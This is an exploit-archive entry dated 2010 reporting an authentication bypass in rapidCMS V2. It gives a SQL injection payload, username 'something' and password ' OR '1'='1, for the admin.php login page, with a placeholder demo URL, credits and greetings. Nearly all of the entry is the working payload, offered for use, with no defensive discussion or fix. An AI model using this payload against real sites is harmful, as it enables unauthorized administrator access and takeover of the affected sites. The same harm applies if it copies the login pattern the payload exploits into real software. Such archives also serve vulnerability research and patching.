id: 13399
date: 07/18/2010
title: rapidCMS V2 Authentication Bypass
author: Mahjong
cves: 

=================================
rapidCMS V2 Authentication Bypass
=================================


# Exploit Title: rapidCMS V2 Authentication Bypass
# Date: [18/07/2010]
# Author: Mahjong
# Software Link: www.rapidcms.de
# Version: V2
# Tested on: Linux
  
* Found by: Mahjong
* E-Mail: mahjong@phcn.ws
* Greetings: Puddy, Ancolon
 
----------------------------------------------------------   
 
Exploit Authentication Bypass:
  
User: something
Pass: ' OR '1'='1
   
----------------------------------------------------------
    
Demo :
http://site.tld/admin.php
   
----------------------------------------------------------



#  0day.today [2023-03-23]  #